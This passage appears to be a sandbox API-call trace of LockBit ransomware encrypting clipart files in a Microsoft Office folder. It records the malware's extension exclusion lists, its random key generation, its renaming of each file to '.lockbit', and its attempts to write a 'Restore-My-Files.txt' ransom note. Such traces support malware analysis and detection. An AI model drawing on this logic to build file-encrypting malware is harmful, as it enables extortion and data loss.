lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.084] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.084] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.084] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.084] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.084] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.084] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.085] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.085] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.085] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.085] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.085] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.085] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.085] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.085] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.085] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.085] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.085] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.085] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF.lockbit") returned 72 [0118.085] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00693_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0118.086] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.086] malloc (_Size=0x40068) returned 0x3e70008 [0118.086] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=7098) returned 1 [0118.086] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.087] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0118.087] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.087] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0118.087] ReadFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0118.093] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.093] malloc (_Size=0xa6) returned 0x77d7a8 [0118.093] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.094] free (_Block=0x77d7a8) [0118.094] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.094] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.094] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.094] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7507bb00, ftCreationTime.dwHighDateTime=0x1bd4b36, ftLastAccessTime.dwLowDateTime=0x61ca6dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7507bb00, ftLastWriteTime.dwHighDateTime=0x1bd4b36, nFileSizeHigh=0x0, nFileSizeLow=0xb20, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH01013_.WMF", cAlternateFileName="")) returned 1 [0118.094] lstrcmpiW (lpString1=".", lpString2="HH01013_.WMF") returned -1 [0118.094] lstrcmpiW (lpString1="..", lpString2="HH01013_.WMF") returned -1 [0118.094] PathFindExtensionW (pszPath="HH01013_.WMF") returned=".WMF" [0118.094] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.094] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.094] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.094] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.094] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.094] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.094] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.094] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.095] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.095] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.095] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.095] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.095] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.095] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.095] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.095] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.095] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.095] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.095] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.095] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.095] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.095] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.095] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.095] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.095] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.095] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.095] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.095] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.095] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.096] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.096] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.096] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.096] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.096] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.096] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.096] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.096] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.096] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.096] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.096] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.096] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.096] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.096] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.096] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.096] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.096] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.096] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.096] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH01013_.WMF") returned 1 [0118.097] lstrcmpiW (lpString1="ntldr", lpString2="HH01013_.WMF") returned 1 [0118.097] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH01013_.WMF") returned 1 [0118.097] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH01013_.WMF") returned -1 [0118.097] lstrcmpiW (lpString1="autorun.inf", lpString2="HH01013_.WMF") returned -1 [0118.097] lstrcmpiW (lpString1="thumbs.db", lpString2="HH01013_.WMF") returned 1 [0118.097] lstrcmpiW (lpString1="iconcache.db", lpString2="HH01013_.WMF") returned 1 [0118.097] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.097] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned=".WMF" [0118.097] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.097] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.097] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.097] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.097] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.097] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.097] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.097] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.097] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.097] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.097] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.097] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.098] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.098] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.098] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.098] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.098] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.098] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.098] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.098] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.098] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.098] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.098] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.098] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.098] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.098] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.098] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.098] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.098] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF.lockbit") returned 72 [0118.098] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01013_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0118.103] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.103] malloc (_Size=0x40068) returned 0x3d70450 [0118.105] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=2848) returned 1 [0118.105] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.105] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0118.105] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.106] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0118.106] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0118.110] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.110] malloc (_Size=0xa6) returned 0x77d7a8 [0118.110] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.111] free (_Block=0x77d7a8) [0118.111] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.111] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.111] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.111] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x538951f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x47c, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH01015_.WMF", cAlternateFileName="")) returned 1 [0118.111] lstrcmpiW (lpString1=".", lpString2="HH01015_.WMF") returned -1 [0118.111] lstrcmpiW (lpString1="..", lpString2="HH01015_.WMF") returned -1 [0118.111] PathFindExtensionW (pszPath="HH01015_.WMF") returned=".WMF" [0118.111] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.111] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.111] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.111] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.111] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.112] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.112] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.113] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.113] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.113] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.113] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.113] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.113] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.113] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.113] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.113] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.113] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.113] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.113] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.113] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.113] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.113] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.113] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.113] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.113] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH01015_.WMF") returned 1 [0118.113] lstrcmpiW (lpString1="ntldr", lpString2="HH01015_.WMF") returned 1 [0118.113] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH01015_.WMF") returned 1 [0118.113] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH01015_.WMF") returned -1 [0118.113] lstrcmpiW (lpString1="autorun.inf", lpString2="HH01015_.WMF") returned -1 [0118.113] lstrcmpiW (lpString1="thumbs.db", lpString2="HH01015_.WMF") returned 1 [0118.113] lstrcmpiW (lpString1="iconcache.db", lpString2="HH01015_.WMF") returned 1 [0118.113] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.113] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned=".WMF" [0118.114] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.114] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.114] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.114] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.114] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.114] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.114] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.114] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.114] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.114] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.114] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.114] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.114] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.114] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.114] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.114] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.114] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.114] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.114] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.114] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.115] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.115] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.115] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.115] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.115] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.115] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.115] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.115] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.115] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF.lockbit") returned 72 [0118.115] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01015_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0118.123] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.123] malloc (_Size=0x40068) returned 0x3ef0008 [0118.123] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=1148) returned 1 [0118.123] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.124] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0118.124] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.125] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0118.125] ReadFile (in: hFile=0x81c, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0118.132] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.132] malloc (_Size=0xa6) returned 0x77d7a8 [0118.132] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.133] free (_Block=0x77d7a8) [0118.133] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.133] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.133] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.133] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x436e0000, ftCreationTime.dwHighDateTime=0x1bd4af4, ftLastAccessTime.dwLowDateTime=0x61ca6dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x436e0000, ftLastWriteTime.dwHighDateTime=0x1bd4af4, nFileSizeHigh=0x0, nFileSizeLow=0xac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH01058_.WMF", cAlternateFileName="")) returned 1 [0118.133] lstrcmpiW (lpString1=".", lpString2="HH01058_.WMF") returned -1 [0118.133] lstrcmpiW (lpString1="..", lpString2="HH01058_.WMF") returned -1 [0118.133] PathFindExtensionW (pszPath="HH01058_.WMF") returned=".WMF" [0118.133] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.133] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.133] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.133] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.133] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.133] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.133] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.133] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.134] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.134] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.134] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.134] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.134] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.134] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.134] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.134] lstrcmpiW 